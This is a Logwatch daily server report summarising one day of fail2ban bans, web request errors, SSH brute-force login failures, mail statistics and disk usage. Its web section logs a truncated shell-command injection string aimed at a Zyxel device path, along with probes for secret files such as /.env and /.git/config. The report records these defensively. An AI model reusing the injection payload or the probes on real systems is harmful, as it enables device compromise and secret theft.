################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Wed Mar 27 04:42:03 2024
Date Range Processed: yesterday
( 2024-Mar-26 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [150:151]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
87.121.69.52 -> google.com:443: 4 Time(s)
A total of 13 sites probed the server
Requests with error response codes
400 Bad Request
null: 19 Time(s)
/: 4 Time(s)
google.com:443: 4 Time(s)
*: 3 Time(s)
+\xD8\x1F\xFC}\xC1n@,\x97\xCC1\x10R\xB1\xE ... F\x0F\xF4\xFAj]: 1 Time(s)
/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 1 Time(s)
/index.htm: 1 Time(s)
12.1.2: 1 Time(s)
7: 1 Time(s)
\x00\x00BBBB\xBA\x8C\xC1\xABDAAA: 1 Time(s)
\xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x ... x09\xC0\x14\xC0: 1 Time(s)
\xC7p\xBC$\xAE\xFA\x8E\xBE\xDD\xD3\x19\xFE ... 92\xC70\xC1\x22: 1 Time(s)
\xE4g-\xB2\xBA@\xA2H6\x89\x89\x12\xA7\x9A\ ... x09\xC0\x13\xC0: 1 Time(s)
\xFD\xE0\xFAD\x94\x1FC\xBE\x98$\x7F\xE4y\x96\xF0\xB6\xD6: 1 Time(s)
]\x8DT\xAF\x8F\xA3^\x7F\x1E\xD2\xD8\xED\xE ... x09\xC0\x13\xC0: 1 Time(s)
mstshash=Administr: 1 Time(s)
500 Internal Server Error
/: 19 Time(s)
/.env: 2 Time(s)
/favicon.ico: 2 Time(s)
/.git/config: 1 Time(s)
/.well-known/security.txt: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/HNAP1/: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/actuator/gateway/routes: 1 Time(s)
/actuator/health: 1 Time(s)
/alive.php: 1 Time(s)
/client/get_targets: 1 Time(s)
/geoserver/web/: 1 Time(s)
/robots.txt: 1 Time(s)
/sitemap.xml: 1 Time(s)
/t4: 1 Time(s)
/teorema505?t=1: 1 Time(s)
/version: 1 Time(s)
/webui/: 1 Time(s)
502 Bad Gateway
/%7CHackMD/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (89.218.49.34): 269 Time(s)
root (218.92.0.53): 66 Time(s)
root (218.92.0.45): 58 Time(s)
root (183.81.169.238): 54 Time(s)
root (218.92.0.33): 54 Time(s)
root (103.36.84.194): 48 Time(s)
root (218.92.0.55): 48 Time(s)
root (218.92.0.40): 42 Time(s)
root (218.92.0.43): 36 Time(s)
root (179.43.180.106): 35 Time(s)
root (218.92.0.51): 34 Time(s)
root (218.92.0.47): 30 Time(s)
root (218.92.0.52): 30 Time(s)
root (218.92.0.59): 18 Time(s)
root (218.92.0.28): 17 Time(s)
root (113.106.88.146): 12 Time(s)
root (201.48.108.11): 12 Time(s)
unknown (212.70.149.150): 12 Time(s)
root (212.70.149.150): 8 Time(s)
unknown (167.172.230.140): 7 Time(s)
root (121.183.30.17): 6 Time(s)
root (158.51.96.38): 6 Time(s)
unknown (185.11.61.88): 6 Time(s)
unknown (62.122.184.252): 6 Time(s)
root (121.129.194.210): 5 Time(s)
root (194.169.175.35): 5 Time(s)
root (85.209.11.27): 5 Time(s)
unknown (141.98.11.179): 5 Time(s)
unknown (194.169.175.35): 5 Time(s)
unknown (85.209.11.254): 5 Time(s)
root (101.33.73.147): 4 Time(s)
root (141.98.11.179): 4 Time(s)
unknown (185.224.128.34): 4 Time(s)
unknown (85.209.11.27): 4 Time(s)
unknown (194.169.175.36): 3 Time(s)
root (171.217.93.19): 2 Time(s)
root (d27-96-67-167.evv.wideopenwest.com): 2 Time(s)
unknown (31.184.198.71): 2 Time(s)
unknown (c-174-168-153-220.hsd1.ma.comcast.net): 2 Time(s)
unknown (fixed-186-96-145-241.totalplay.net): 2 Time(s)
mysql (141.98.11.179): 1 Time(s)
root (31.184.198.71): 1 Time(s)
root (85.209.11.254): 1 Time(s)
sshd (194.169.175.35): 1 Time(s)
sshd (194.169.175.36): 1 Time(s)
unknown (101.33.73.147): 1 Time(s)
unknown (175.203.118.149): 1 Time(s)
unknown (183.105.173.232): 1 Time(s)
unknown (185.196.8.151): 1 Time(s)
Invalid Users:
Unknown Account: 74 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
21.364K Bytes accepted 21,877
21.364K Bytes sent via SMTP 21,877
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
5 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
5 Total 4xx Rejects 100.00%
======== ==================================================
38 Connections
22 Connections lost (inbound)
38 Disconnections
1 Removed from queue
1 Sent via SMTP
3 Timeouts (inbound)
5 SMTP dialog errors
2 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 75 Time(s)
Failed logins from:
31.184.198.71: 1 time
85.209.11.27: 5 times
85.209.11.254: 1 time
89.218.49.34 (mx12.vertex.kz): 269 times
96.27.167.67 (d27-96-67-167.evv.wideopenwest.com): 2 times
101.33.73.147: 4 times
103.36.84.194: 48 times
113.106.88.146: 12 times
121.129.194.210: 6 times
121.183.30.17: 6 times
141.98.11.179 (srv-141-98-11-179.serveroffer.net): 5 times
158.51.96.38 (unknown.ip-xfer.net): 6 times
171.217.93.19: 2 times
179.43.180.106 (hostedby.privatelayer.com): 35 times
183.81.169.238: 54 times
194.169.175.35: 6 times
194.169.175.36: 1 time
201.48.108.11 (201-048-108-011.static.ctbc.com.br): 12 times
212.70.149.150: 8 times
218.92.0.28: 17 times
218.92.0.33: 54 times
218.92.0.40: 42 times
218.92.0.43: 36 times
218.92.0.45: 58 times
218.92.0.47: 30 times
218.92.0.51: 34 times
218.92.0.52: 30 times
218.92.0.53: 66 times
218.92.0.55: 48 times
218.92.0.59: 18 times
Illegal users from:
2001:470:1:c84::28 (scan-18o.shadowserver.org): 1 time
undef: 43 times
31.184.198.71: 3 times
62.122.184.252: 6 times
65.49.1.78 (scan-56m.shadowserver.org): 1 time
85.209.11.27: 4 times
85.209.11.254: 5 times
89.218.49.34 (mx12.vertex.kz): 16 times
101.33.73.147: 1 time
141.98.11.179 (srv-141-98-11-179.serveroffer.net): 5 times
167.172.230.140: 7 times
174.168.153.220 (c-174-168-153-220.hsd1.ma.comcast.net): 2 times
175.203.118.149: 5 times
183.105.173.232: 5 times
185.11.61.88: 6 times
185.196.8.151: 1 time
185.224.128.34: 4 times
186.96.145.241 (fixed-186-96-145-241.totalplay.net): 2 times
194.169.175.35: 5 times
194.169.175.36: 3 times
212.70.149.150: 13 times
**Unmatched Entries**
Disconnecting: Protocol error: expected packet type 21, got 20 [preauth] : 1 time(s)
error: buffer_get_string_ret: incomplete message [preauth] : 1 time(s)
Disconnecting: Change of username or service not allowed: (root,ssh-connection) -> (test,ssh-connection) [preauth] : 1 time(s)
Disconnecting: Change of username or service not allowed: (0,ssh-connection) -> (root,ssh-connection) [preauth] : 1 time(s)
fatal: buffer_get_string: buffer error [preauth] : 1 time(s)
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (ubnt,ssh-connection) [preauth] : 1 time(s)
Disconnecting: Change of username or service not allowed: (root,ssh-connection) -> (admin,ssh-connection) [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop19598p1 394G 243G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################